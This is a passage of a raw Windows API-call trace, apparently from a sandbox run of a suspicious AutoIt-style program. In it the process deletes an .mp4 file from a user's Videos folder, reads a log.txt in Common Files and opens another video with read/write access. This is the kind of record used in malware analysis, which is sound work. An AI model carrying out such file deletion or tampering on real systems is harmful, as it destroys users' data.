[0192.353] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.353] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0192.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0192.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.354] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0192.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0192.354] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0192.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0192.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0192.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4", lpFilePart=0x0) returned 0x39 [0192.354] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc71b0f80, ftCreationTime.dwHighDateTime=0x1d5e0cb, ftLastAccessTime.dwLowDateTime=0xf8e453b0, ftLastAccessTime.dwHighDateTime=0x1d5d972, ftLastWriteTime.dwLowDateTime=0x17d8a9a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xc1eb, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="IipHJEO8.mp4", cAlternateFileName="")) returned 0x90ae18 [0192.354] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\iiphjeo8.mp4")) returned 1 [0192.356] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc71b0f80, ftCreationTime.dwHighDateTime=0x1d5e0cb, ftLastAccessTime.dwLowDateTime=0xf8e453b0, ftLastAccessTime.dwHighDateTime=0x1d5d972, ftLastWriteTime.dwLowDateTime=0x17d8a9a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xc1eb, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="IipHJEO8.mp4", cAlternateFileName="")) returned 0 [0192.356] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0192.359] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0192.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0192.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0192.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0192.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0192.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0192.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0192.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0192.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0192.361] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0192.361] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0192.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0192.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0192.362] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0192.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0192.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.363] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.363] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.363] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0192.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0192.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.363] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.363] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.363] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.363] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.363] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.363] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.363] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0192.363] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.363] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.364] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0192.364] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x33ce, lpOverlapped=0x0) returned 1 [0192.364] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0192.364] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x33ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.364] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0192.364] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0192.364] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0192.366] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0192.366] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.366] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.366] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0192.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.366] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.366] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0192.366] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.367] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\sq9web5cn_9jducj7p.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.367] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: 